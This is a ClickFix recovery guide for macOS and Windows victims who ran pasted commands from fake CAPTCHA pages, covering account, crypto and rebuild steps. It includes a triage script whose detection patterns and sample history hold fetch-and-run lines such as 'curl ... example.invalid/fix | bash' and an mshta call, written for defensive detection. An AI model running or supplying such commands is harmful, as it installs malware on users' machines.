ClickFix Recovery Guide

Recovery guide · ClickFix · macOS & Windows

You pasted a command you shouldn’t have. You can still fix this.

A fake “verification” page told you to copy something and run it in Terminal (macOS) / the Run box (Windows). Doing so installed malware that steals passwords and redirects cryptocurrency. This guide walks you out of it, in the right order.

Written after a real infection, with the steps that actually worked. Pick your system below — the urgent account steps are the same for both; the cleanup differs.

The one thing to understand: the malware already copied your data — cleaning the computer won’t un-steal it. The live emergency is your accounts and any crypto, not the machine. So the order below puts changing passwords and securing crypto before fixing the device. That order matters.


What just happened

It’s called “ClickFix”

ClickFix is a trick, not a hack. A web page — often a fake CAPTCHA or “I’m not a robot” check, or a phony “fix this error” prompt — tells you to copy some text and run it in Terminal (macOS), in the Run box (Win+R), or in PowerShell (Windows). The instant you run it, it quietly downloads and installs malware.

It works precisely because you ran it yourself. Your computer’s built-in protections assume an action you take on purpose is one you meant, so they step aside. A password box usually follows; if you typed your Mac/Windows password in, it handed the malware administrator control. The pasted command typically launches a trusted Windows tool (like PowerShell or mshta) so it blends in, then pulls down the real payload.

The payload is commonly an “infostealer” — software built to grab passwords, browser data, and cryptocurrency wallets fast — on Windows often Lumma, StealC, or similar, sometimes alongside a remote-access trojan — sometimes bundled with a “clipper” that swaps copied crypto addresses. This guide uses one real macOS case as its worked example, with Windows specifics on their own pages.

Am I affected?

Signs this happened to you

  • A “verification” or “fix” page told you to copy text and run it in Terminal (macOS), or via the Run box (Win+R), the Win+X menu, or the Explorer address bar (Windows).
  • On a Mac: you ran it, and then a password prompt appeared that you typed your Mac password into.
  • On Windows: you pressed Win+R, pasted, and hit Enter — possibly seeing a brief black window flash and vanish.
  • Nothing obvious seemed to happen afterward. (That’s the design; it runs silently in the background.)
  • Optional later signs: unexpected logins, password-reset emails you didn’t request, or crypto sent to an address you don’t recognise.

If the paste step matches, treat yourself as affected and start the steps below. It’s better to over-react here than to wait for proof.

Do this now — in order

The recovery protocol


Work top to bottom. The sequence is deliberate: stop the bleeding, move to safe ground, then secure what can still be lost. The steps marked “Do now” are time-sensitive, and they’re identical on Mac and Windows.

1. Disconnect the device from the internet (Do now)

Turn off Wi-Fi or unplug the network cable. Leave it off.

This cuts off any remote control and stops further data being sent out. The machine is safest while it’s offline — keep it that way until you rebuild it.

2. Switch to a different, clean device (Use another device)

Do every step below on a phone or a computer that was not infected — ideally on a different network (mobile data is fine).

Anything you type on the infected machine could be watched or its clipboard tampered with. Don’t use it to log in or change passwords.

3. Change your passwords — and log out everywhere (Do now)

From the clean device, change passwords in this order: email first (it’s the reset path for everything else), then banking/financial, then everything important. For each account, also use its “log out of all sessions / sign out everywhere” option, and turn on two-factor authentication.

The malware can steal login “session cookies,” which let an attacker stay logged in even after you change the password — unless you also end active sessions. That step is what closes the door.

4. If you hold any crypto, treat it as an emergency (Do now)

On the clean device, create a brand-new wallet with a new recovery phrase and move your funds there. Assume the old wallet and its recovery phrase are compromised. Never reuse a recovery phrase that was ever stored on the infected machine.

This malware class hunts wallet files and recovery phrases, and a “clipper” can silently redirect transactions. See the crypto section below.

5. Tell your bank; consider a credit freeze

Report possible exposure of card and account details. Watch for unusual activity, and consider a fraud alert or credit freeze with the relevant credit bureau.

Card numbers and banking logins are prime targets; your bank can monitor or reissue.

6. Rotate any technical & work credentials

If the machine held SSH keys, API keys, or saved logins for hosting, domains, or client accounts, reissue the keys and reset those passwords too.

Stealers specifically collect developer secrets. One reused credential can spread the damage.

7. Rebuild the machine, then report it

On a Mac: erase and reinstall macOS rather than picking the malware out by hand — the Clean & rebuild (Mac) guide walks you through it, including rescuing your files safely first.

On Windows: reset or cleanly reinstall Windows rather than picking the malware out by hand — the Clean & rebuild (Windows) guide walks you through it, including rescuing your files safely first.

A clean reinstall is the only way to be sure persistence is gone. Then report the incident to your national fraud or cybercrime authority — it helps others and may support any claim.

Why changing the password isn’t always enough

Modern stealers grab the small files (“cookies”) that keep you logged in. With those, an attacker can resume your existing session — sometimes bypassing two-factor authentication — even after a password change. That’s why every step above pairs the new password with “log out of all sessions.” Do both, not just one.
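To make the point in step 3 and in the paragraph above concrete, here is an added illustration (not code from this guide or from any site it describes): a minimal in-memory account store in which browser session cookies are random tokens. The names AccountStore, change_password and revoke_all_sessions are this example's own. A token copied by a stealer keeps working after the password is rotated; only the "log out of all sessions" path actually evicts it.

```python
"""Why a password change alone does not evict a stolen session cookie.

Added example, not the guide's own code. Models a web service's session
store: login hands out a random cookie, every request looks the cookie up,
change_password rotates only the credential, and revoke_all_sessions is the
'sign out everywhere' button. Names and data here are illustrative.
"""
import hashlib
import hmac
import os
import secrets
from typing import Dict, Optional, Tuple


def _hash_password(password: str, salt: bytes) -> bytes:
    # A salted PBKDF2 stands in for a real password hash; the point is the sessions.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


class AccountStore:
    def __init__(self) -> None:
        self._users: Dict[str, Tuple[bytes, bytes]] = {}   # user -> (salt, hash)
        self._sessions: Dict[str, str] = {}                # cookie token -> user

    def register(self, user: str, password: str) -> None:
        salt = os.urandom(16)
        self._users[user] = (salt, _hash_password(password, salt))

    def login(self, user: str, password: str) -> Optional[str]:
        """Return a fresh session cookie on success, None on a wrong password."""
        salt, stored = self._users[user]
        if not hmac.compare_digest(stored, _hash_password(password, salt)):
            return None
        token = secrets.token_urlsafe(32)
        self._sessions[token] = user
        return token

    def user_for_cookie(self, token: str) -> Optional[str]:
        """What the server does on every request: is this cookie still valid?"""
        return self._sessions.get(token)

    def change_password(self, user: str, new_password: str) -> None:
        """Rotates the credential only. Existing cookies are untouched,
        which is exactly the gap a stolen cookie exploits."""
        salt = os.urandom(16)
        self._users[user] = (salt, _hash_password(new_password, salt))

    def revoke_all_sessions(self, user: str) -> int:
        """The 'log out of all sessions' button: drop every cookie for this user."""
        stale = [t for t, u in self._sessions.items() if u == user]
        for t in stale:
            del self._sessions[t]
        return len(stale)


def demo_stolen_cookie() -> Tuple[bool, bool]:
    """Returns (cookie still valid after password change,
                cookie still valid after revoke_all_sessions)."""
    store = AccountStore()
    store.register("alice", "correct horse battery staple")
    # The stealer copies this token from the browser profile.
    stolen = store.login("alice", "correct horse battery staple")
    store.change_password("alice", "new-and-unique-password")
    after_change = store.user_for_cookie(stolen) == "alice"
    store.revoke_all_sessions("alice")
    after_revoke = store.user_for_cookie(stolen) == "alice"
    return after_change, after_revoke


if __name__ == "__main__":
    print("stolen cookie valid after password change, after revoke:", demo_stolen_cookie())
```

The design point: a password hash and a session table are independent records, so a service that does not tie the two together leaves every existing cookie alive. Services that revoke sessions automatically on password change are doing the revoke_all_sessions step for you; the guide's advice is to press the button yourself because you cannot tell from the outside which kind you are dealing with.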

Recommended — rebuild your logins

Use a password manager for the reset

You’re about to change a lot of passwords. A manager lets you set a strong, unique one per account so a future breach can’t cascade — and it won’t autofill your credentials into a look-alike phishing page.

Prefer free and open-source? Bitwarden is excellent.

Fix the machine

Clean & rebuild: wipe, don’t tinker

For malware that ran with administrator rights, the only way to be certain it’s gone is a clean reinstall. Each guide gets your personal files out safely first — data only, never programs — then rebuilds.

Protect your crypto

The clipboard trap

Many of these infections include a “clipper”: a component that watches your clipboard and, the moment you copy a cryptocurrency address, silently replaces it with the attacker’s address. You paste, glance, and send — and the money goes to them.

If you sent crypto from the infected machine, verify it

Check your transaction history against the address you meant to send to. If a payment went somewhere unexpected, that’s the clipper. On a block explorer you can confirm exactly where funds landed.

Going forward: move funds to a fresh wallet (new recovery phrase) made on a clean device, and always re-check a pasted address against the source before sending — ideally on a device you trust.

Recommended — secure your crypto

Move funds to a hardware wallet

A hardware wallet keeps your keys on a separate offline device, so a future infostealer on your computer can’t read them. Set one up on a clean device and move your funds using a brand-new recovery phrase.

For responders

Technical details & indicators of compromise

The full breakdown — attack chain, persistence locations, recovered capabilities, and indicators of compromise — lives on a page per system. The macOS page documents one fully analysed sample; the Windows page focuses on the durable, artifact-based indicators, since Windows payloads change campaign to campaign.

Questions people ask

ClickFix recovery FAQ

Short, direct answers to the things people search for right after running a command from a fake CAPTCHA.

I pasted the command from a fake CAPTCHA — what should I do first?

Treat it as a data breach, not a computer problem. On a different, clean device, change your email password first (it’s the reset path for everything else), then your banking and other important accounts, and use each account’s “log out of all sessions” option. If you hold cryptocurrency, move it to a new wallet. Cleaning or resetting the infected machine comes after all of that.

Did it steal my passwords?

Assume yes for anything saved in your browser or on the device. These infostealers grab saved passwords, browser cookies, autofill data and crypto wallets within seconds of running. That is exactly why changing your passwords from a clean device is the first priority.

Nothing happened after I ran it — am I safe?

Not necessarily. Many stealers do their work silently in a few seconds and then delete themselves, so a quiet, normal-looking machine is not evidence that you’re fine. Go through the account-security steps regardless of whether you saw anything happen.

Will changing my password be enough?

Not on its own. Stealers also take session cookies that can keep an attacker logged in even after you change a password. Pair every new password with “log out of all sessions” / “sign out everywhere,” and turn on two-factor authentication.

Do I need to factory reset, or is an antivirus scan enough?

A scan can find and remove known payloads, but if the malware ran with administrator rights the only way to be certain it’s gone is a clean reinstall — “Erase All Content and Settings” on a Mac, or “Reset this PC” / a clean USB install on Windows. Either way, the account-security steps matter more than the wipe.

Is my cryptocurrency at risk?

Yes. These infections specifically hunt wallet files and recovery phrases, and many include a “clipper” that silently swaps a copied crypto address for the attacker’s. Move funds to a new wallet with a new recovery phrase, created on a clean device, and always re-check a pasted address before sending.

How do I find out which command I ran?

On Windows, the Run dialog history is stored in the registry (the RunMRU key) and usually still holds the line you pasted. On a Mac, your shell history may show it. Don’t re-run it — the technical pages list safe, read-only ways to check.
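The answer above names two artifacts, the RunMRU registry key and the shell history file, without showing how to read them. As an added example (not code from this guide or its technical pages), the script below parses text copied off the infected machine, a `reg export` of the RunMRU key and the contents of `~/.zsh_history`, and flags entries that look like paste-to-run lures. It only reads and reports; nothing is executed. It assumes the usual RunMRU layout (one-letter value names, command text followed by `\1`, and an MRUList value listing names newest first) and the zsh extended history format. The sample data is constructed and the domain is a placeholder.

```python
"""Read-only triage: recover the pasted command from Windows RunMRU or zsh history.

Added example, not the guide's own code. Feed it text you exported or copied
off the infected machine; it never runs anything it finds.
"""
import re
from typing import List, Tuple

# Heuristics for paste-to-run lures: something that fetches remote content
# combined with something that executes it. Extend as campaigns change.
DOWNLOAD = re.compile(
    r"(curl|wget|\biwr\b|invoke-webrequest|downloadstring|mshta|bitsadmin)", re.I)
EXECUTE = re.compile(
    r"(\|\s*(ba|z)?sh\b|\biex\b|invoke-expression|base64\s+(-d|--decode)|mshta)", re.I)


def looks_like_paste_lure(command: str) -> bool:
    """True when a command both fetches and executes remote content."""
    return bool(DOWNLOAD.search(command) and EXECUTE.search(command))


def parse_run_mru(reg_export: str) -> List[str]:
    """Return Run-box commands, most recent first.

    Input is the text of:
      reg export "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU" out.reg
    Assumed layout: values a, b, c... hold 'command\\1'; MRUList orders them newest first.
    """
    entries = {}
    order = ""
    for line in reg_export.splitlines():
        m = re.match(r'^"([A-Za-z]+)"="(.*)"$', line.strip())
        if not m:
            continue
        name = m.group(1)
        data = re.sub(r"\\(.)", r"\1", m.group(2))   # undo .reg escaping of \ and "
        if name == "MRUList":
            order = data
        else:
            entries[name] = data.removesuffix("\\1")  # strip the trailing \1 marker
    return [entries[k] for k in order if k in entries]


def parse_zsh_history(text: str) -> List[Tuple[int, str]]:
    """Return (unix timestamp or 0, command) per line of ~/.zsh_history.

    Extended-history lines look like ': 1700000000:0;command'; plain lines
    carry no timestamp. Multi-line commands are not reassembled here.
    """
    out = []
    for line in text.splitlines():
        m = re.match(r"^: (\d+):\d+;(.*)$", line)
        if m:
            out.append((int(m.group(1)), m.group(2)))
        elif line.strip():
            out.append((0, line))
    return out


def triage(reg_export: str, zsh_history: str) -> List[str]:
    """Flagged commands from both artifacts, Windows entries first."""
    candidates = parse_run_mru(reg_export) + [c for _, c in parse_zsh_history(zsh_history)]
    return [c for c in candidates if looks_like_paste_lure(c)]


# Constructed sample artifacts; example.invalid is a placeholder domain.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU]
"MRUList"="cab"
"a"="notepad\\1"
"b"="calc\\1"
"c"="mshta http://example.invalid/verify\\1"
'''

SAMPLE_ZSH = """: 1700000000:0;ls -la
: 1700000042:0;curl -fsSL http://example.invalid/fix | bash
: 1700000100:0;git status
"""

if __name__ == "__main__":
    for cmd in triage(SAMPLE_REG, SAMPLE_ZSH):
        print("flagged:", cmd)
```

The zsh timestamp tells you when the paste happened, which is the cut-off for "anything I logged into after this is suspect"; on Windows the RunMRU entry is not timestamped, so pair it with the Run dialog's last-modified time from a registry viewer or a forensic tool if you need the moment.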

Does this affect Macs too, or only Windows?

Both. ClickFix shows Mac users a command to paste into Terminal (often installing the Atomic macOS Stealer family) and Windows users one for the Run box or PowerShell (often Lumma, StealC and similar). The recovery steps in this guide cover both systems.

What is ClickFix?

ClickFix is a social-engineering trick in which a fake CAPTCHA or error page convinces you to copy and run a command yourself, which installs malware. Because you run it deliberately, it sidesteps many protections. It surged through 2025–2026 to become one of the most common attack methods, second only to phishing.

Next time

How to not fall for it again

No real site asks you to run commands

Legitimate websites, CAPTCHAs, and error messages never ask you to paste commands into Terminal, the Run box, PowerShell, or the address bar. That request alone is the red flag.

Running pasted text is the danger

If instructions end by piping text into your shell, or tell you to press shortcuts to open Terminal first, stop. If instructions tell you to press Win+R or Win+X, or to paste into Explorer’s address bar, stop. Close the page.

Keep your system updated

Recent macOS versions warn when pasting into Terminal could be harmful — don’t dismiss that warning. Keep Windows and Microsoft Defender current; consider blocking the Run dialog for standard users via Group Policy.

Verify crypto addresses at the source

Always confirm a pasted wallet address against a trusted source before sending, on a device you trust.